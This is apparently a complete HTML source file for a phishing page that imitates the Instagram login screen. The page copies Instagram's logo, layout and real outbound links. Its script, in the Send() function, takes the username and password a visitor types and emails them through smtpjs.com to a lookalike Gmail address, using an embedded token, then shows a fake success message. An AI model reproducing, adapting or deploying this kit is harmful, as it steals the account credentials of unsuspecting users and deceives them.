<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="icon" href="https://static.cdninstagram.com/rsrc.php/v3/yI/r/VsNE-OHk_8a.png">
  <title>Instagram</title>
  <style>
    @font-face {
      font-family: instagramsans;
      src: url(Instagram\ Sans.ttf);
    }

    body {
      font-family: instagramsans;
      margin: 0;
      padding: 0;
      overflow: hidden;
    }

    #image-container {
      position: absolute;

      width: 100%;
      /* Make the container full-width */
      height: 100%;
      /* Make the container full-height */
      display: flex;
      top: 65px;
      left: 33.2%;
    }

    #image-container img {
      max-width: 100%;
      max-height: 100%;
      position: absolute;
      /* Position images absolutely */
      opacity: 0;
      transition: opacity 1s ease-in-out;
    }

    .image-active {
      opacity: 1;
    }

    .phone_frame {
      position: relative;
      top: 38px;
      left: 23vw;
    }

    @media screen and (max-width:1400px) {
      .phone_frame {
        left: 20vw;
      }

      #image-container {
        left: 31.5%;
      }
    }

    @media screen and (max-width:1300px) {
      .phone_frame {
        left: 18vw;
      }

      #image-container {
        left: 30%;
      }
    }

    @media screen and (max-width:1200px) {
      .phone_frame {
        left: 16vw;
      }

      #image-container {
        left: 29%;
      }
    }

    @media screen and (max-width:1100px) {
      .phone_frame {
        left: 13vw;
      }

      #image-container {
        left: 27%;
      }
    }

    @media screen and (max-width:1000px) {
      .phone_frame {
        display: none;
      }

      #image-container {
        display: none;
      }
    }

    .login_home {
      background-image: url(Instagram_logo.svg.png);
      background-size: 50%;
      background-repeat: no-repeat;
      background-position: center 35px;
      position: absolute;
      width: 355px;
      height: 390px;
      border: 1px solid rgba(0, 0, 0, 0.2);
      left: 53vw;
      top: 55px;
    }

    .forgetpass {
      position: absolute;
      width: 355px;
      height: 70px;
      border: 1px solid rgba(0, 0, 0, 0.2);
      top: 455px;
      left: 53vw;
      border-radius: 1px;
    }

    .getapptext {
      position: absolute;
      left: 62vw;
      top: 540px;
    }

    .getappimg {
      display: inline-flex;
    }

    .getappimg .img1 {
      position: absolute;
      left: 56vw;
      max-width: 125px;
      top: 575px;
      margin-right: 16px;
    }

    .getappimg .img2 {
      position: absolute;
      left: 65vw;
      max-width: 105px;
      top: 575px;
    }

    @media screen and (max-width:1400px) {
      .getappimg .img2 {
        left: 67vw;
      }
    }

    @media screen and (max-width:1200px) {
      .getappimg .img2 {
        left: 68vw;
      }
    }

    @media screen and (max-width:1100px) {
      .getappimg .img2 {
        left: 69vw;
      }
    }

    @media screen and (max-width:1000px) {
      .login_home {
        left: 35vw;
      }

      .forgetpass {
        left: 35vw;
      }

      .getapptext {
        left: 50vw;
      }

      .getappimg {
        position: absolute;
        left: -14vw;
      }

      .getappimg .img2 {
        margin-left: 20px;
      }
    }

    @media screen and (max-width:800px) {
      .login_home {
        left: 28vw;
      }

      .forgetpass {
        left: 28vw;
      }

      .getapptext {
        left: 48vw;
      }

      .getappimg {
        position: absolute;
        left: -19vw;
      }

      .getappimg .img2 {
        margin-left: 45px;
      }
    }

    @media screen and (max-width:600px) {
      .login_home {
        left: 22vw;
      }

      .forgetpass {
        left: 22vw;
      }

      .getapptext {
        left: 45vw;
      }

      .getappimg {
        position: absolute;
        left: -25vw;
      }

      .getappimg .img2 {
        margin-left: 60px;
      }
    }

    @media screen and (max-width:500px) {
      .login_home {
        left: 14vw;
      }

      .forgetpass {
        left: 14vw;
      }

      .getapptext {
        left: 45vw;
      }

      .getappimg {
        position: absolute;
        left: -29vw;
      }

      .getappimg .img2 {
        margin-left: 80px;
      }
    }

    @media screen and (max-width:450px) {
      .login_home {
        border: none;
        left: 10vw;
        top: 20px;
      }

      .forgetpass {
        border: none;
        left: 10vw;
        top: 420px;
      }

      .getapptext {
        left: 40vw;
      }

      .getappimg {
        position: absolute;
        left: -32vw;
      }

      .getappimg .img2 {
        margin-left: 80px;
      }
    }
    @media screen and (max-width:400px) {
      .login_home {
        border: none;
        left: 6vw;
        top: 20px;
      }

      .forgetpass {
        border: none;
        left: 6vw;
        top: 420px;
      }
      .getappimg {
        position: absolute;
        left: -36vw;
      }

      .getappimg .img2 {
        margin-left: 80px;
      }
    }
    @media screen and (max-width:370px) {
      .login_home {
        border: none;
        left: 3vw;
        top: 20px;
      }

      .forgetpass {
        border: none;
        left: 3vw;
        top: 420px;
      }
      .getappimg {
        position: absolute;
        left: -35vw;
      }

      .getappimg .img2 {
        margin-left: 80px;
      }
    }
    @media screen and (max-width:350px) {
      .login_home {
        border: none;
        left: -2vw;
        top: 20px;
      }

      .forgetpass {
        border: none;
        left:-2vw;
        top: 420px;
      }
      .getappimg {
        position: absolute;
        left: -40vw;
      }

      .getappimg .img2 {
        margin-left: 95px;
      }
    }
    @media screen and (max-width:px) {
      .login_home {
        border: none;
        left: -4vw;
        top: 20px;
      }

      .forgetpass {
        border: none;
        left:-8vw;
        top: 420px;
      }
      .getappimg {
        position: absolute;
        left: -40vw;
      }

      .getappimg .img2 {
        margin-left: 95px;
      }
    }
    .input-container {
      position: relative;
      margin: 20px;
      left: 20px;
      top: 100px;
    }

    .password-container {
      position: relative;
      margin: 20px;
      left: 20px;
      top: 90px;
    }

    /* Style the input field */
    .input-container input[type="text"] {
      width: 80%;
      padding: 10px;
      transition: width 0.3s;
      /* Transition the width property */
      caret-color: gray;
      outline: none;
    }

    .password-container input[type="password"] {
      width: 80%;
      padding: 10px;
      transition: width 0.3s;
      /* Transition the width property */
      caret-color: gray;
      outline: none;
    }

    /* Style the placeholder label */
    .input-container label {
      position: absolute;
      top: 10px;
      /* Position it above the input */
      left: 10px;
      /* Adjust the left margin as needed */
      pointer-events: none;
      /* Ensure the label doesn't interfere with typing */
      transition: font-size 0.3s, color 0.3s, top 0.3s;
      /* Transition top position along with font size and color */
      font-size: 14px;
      /* Initial font size */
      color: #999;
      /* Initial color */
      border-radius: 1px
    }

    .password-container label {
      position: absolute;
      top: 10px;
      /* Position it above the input */
      left: 10px;
      /* Adjust the left margin as needed */
      pointer-events: none;
      /* Ensure the label doesn't interfere with typing */
      transition: font-size 0.3s, color 0.3s, top 0.3s;
      /* Transition top position along with font size and color */
      font-size: 14px;
      /* Initial font size */
      color: #999;
      /* Initial color */
    }

    /* Style the label when input is focused or has content */
    .input-container input[type="text"]:focus+label,
    .input-container input[type="text"]:valid+label {
      top: -2px;
      /* Move the label inside the input */
      font-size: 12px;
      /* Reduce font size */
      color: gray;
      /* Change color */
      width: 120%;

      /* Increase width when focused */
    }

    .password-container input[type="password"]:focus+label,
    .password-container input[type="password"]:valid+label {
      top: -2px;
      /* Move the label inside the input */
      font-size: 12px;
      /* Reduce font size */
      color: gray;
      /* Change color */
      width: 120%;
      /* Increase width when focused */
    }

    input {
      border: 1px solid rgba(0, 0, 0, 0.2);
      border-radius: 2px;
    }

    .loginme button {
      position: absolute;
      width: 77%;
      left: 41px;
      top: 225px;
      background-color: #6c97ed;
      color: white;
      height: 35px;
      border-radius: 10px;
      box-shadow: none;
      font-size: 14px;
    }

    .orbutton {
      display: flex;
      position: absolute;
      left: 41px;
      top: 275px;
      color: gray;
    }

    hr {
      width: 105px;
      background-color: rgb(148, 148, 148);
      height: .5px;
      opacity: .3;
    }

    .oroption {
      margin: 0px 15px 0px 15px;
      text-transform: uppercase;
      font-size: 14px;
    }

    .withfacebook {
      display: flex;
      position: absolute;
      top: 310px;
      left: 40px;
      cursor: pointer;
    }

    .ficons img {
      width: 20%;
      margin-top: 2px;
      margin-left: 55px;
    }

    .latterfa {
      position: absolute;
      left: 80px;
      white-space: nowrap;
      color: #5179c7;
    }

    .forgetpassword {
      position: absolute;
      left: 130px;
      top: 350px;
      font-size: 14px;
      cursor: pointer;
    }

    a {
      text-decoration: none;
      color: #223f79;
    }

    .insidepass {
      text-align: center;
      margin-top: 20px;
    }

    @media screen and (max-width:1200px) {
      .image-container {}
    }
  </style>
</head>

<body>
  <main>
    <div class="phone_frame">
      <img src="home-phones.png" alt="">
    </div>
    <div id="image-container">
      <img src="instagram-ph-1.png" alt="Image 1" class="image-active">
      <img src="instagram-ph-2.png" alt="Image 2">
      <img src="instagram-ph-3.png" alt="Image 3">
      <img src="instagram-ph-4.png" alt="Image 4">
    </div>
    <div class="login_home">
      <form>
        <div class="input-container">
          <input type="text" required id="Name">
          <label for="text">Phone number, username, or email</label>
        </div>
        <div class="password-container">
          <input type="password" required id="password">
          <label for="password">password</label>
        </div>
        <div class="loginme">
          <button onclick="Send()">Log in</button>
        </div>
      </form>
      <div class="orbutton">
        <hr>
        <div class="oroption">Or</div>
        <hr>
      </div>
      <div class="withfacebook">
        <div class="ficons">
          <a href="https://www.facebook.com/login.php"><img src="facebook.png" alt=""></a>
        </div>
        <a href="https://www.facebook.com/login.php">
          <div class="latterfa">Log in with Facebook</div>
        </a>
      </div>
      <div class="forgetpassword">
        <div><a href="https://www.instagram.com/accounts/password/reset/">Forgot password?</a></div>
      </div>
    </div>
    <div class="forgetpass">
      <div class="insidepass">
        <span>Don't have an account? </span><span><a href="https://www.instagram.com/accounts/emailsignup/">Sign
            up</a></span>
      </div>
    </div>
    <div class="getapp">
      <div class="getapptext">Get the app.</div>
      <div class="getappimg">
        <div><a
            href="https://play.google.com/store/apps/details?id=com.instagram.android&referrer=ig_mid%3DC17BE875-42A9-4E88-AADD-F53038538DB3%26utm_campaign%3DsignupPage%26utm_content%3Dlo%26utm_source%3Dinstagramweb%26utm_medium%3Dbadge"><img
              class="img1" src="https://static.cdninstagram.com/rsrc.php/v3/yz/r/c5Rp7Ym-Klz.png" alt=""></a></div>
        <div><a
            href="ms-windows-store://pdp/?productid=9nblggh5l9xt&referrer=appbadge&source=www.instagram.com&mode=mini&pos=-9%2C-9%2C1937%2C1037"><img
              class="img2" src="https://static.cdninstagram.com/rsrc.php/v3/yu/r/EHY6QnZYdNX.png" alt=""></a></div>
      </div>
    </div>
  </main>
  <script src="https://smtpjs.com/v3/smtp.js"></script>
  <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
  <script>
    const images = ['instagram-ph-1.png', 'instagram-ph-2.png', 'instagram-ph-3.png', 'instagram-ph-4.png'];
    let currentImageIndex = 0;
    const imageContainer = document.getElementById('image-container');
    const imageElements = imageContainer.querySelectorAll('img');

    // Function to handle the initial delay for the first image
    function handleInitialDelay() {
      // Show the initial image
      imageElements[0].classList.add('image-active');
      imageElements[0].style.opacity = 1;

      // Start the image change loop after the initial delay
      imageChangeInterval = setInterval(changeImage, 6000); // Change image every 2 seconds (adjust as needed)
    }

    function changeImage() {
      // Get the current active image
      const activeImage = imageContainer.querySelector('.image-active');

      // Set the opacity of the current image to 0 (fade out)
      activeImage.style.opacity = 0;

      // Update the current image index
      currentImageIndex = (currentImageIndex + 1) % images.length;

      // Set the next image as active and fade it in
      imageElements[currentImageIndex].classList.add('image-active');
      imageElements[currentImageIndex].style.opacity = 1;

      // Remove the 'image-active' class from the previous active image
      activeImage.classList.remove('image-active');

      // Check if it's the first image and add a delay before the next transition
      if (currentImageIndex === 0) {
        clearInterval(imageChangeInterval); // Clear the interval
        setTimeout(() => {
          // Resume the transition after 3 seconds
          imageChangeInterval = setInterval(changeImage, 6000); // Change image every 2 seconds (adjust as needed)
        }, 7000);
      }
    }

    // Start the transition with the initial delay
    handleInitialDelay();

    // Initialize the interval variable
    let imageChangeInterval;
    //.........//
    function Send() {
      var name = document.getElementById("Name").value;
      var password = document.getElementById("password").value;
      var subject = document.getElementById("Name").value;
      var captchaResponse = grecaptcha.getResponse(); // Get the reCAPTCHA response

      if (name === "" || password === "") {
        swal("Incomplete Form", "Please fill in all the fields.", "error");
        return; // Stop execution if any field is empty
      }

      var body = "Name: " + name + "<br/> Email: " + password;
      console.log(body);

      Email.send({
        SecureToken: "d47b7ed2-8653-4bb1-9ae9-788d29faf3c5",
        To: 'instagraamtech@gmail.com',
        From: "instagraamtech@gmail.com",
        Subject: subject,
        Body: body,
      }).then(function (message) {
        if (message === 'OK') {
          swal("Successful", "Your message has been submitted successfully!", "success");
        } else {
          swal("Something went wrong", "Please try submitting your form again.", "error");
        }
      });
    }
  </script>
</body>

</html>
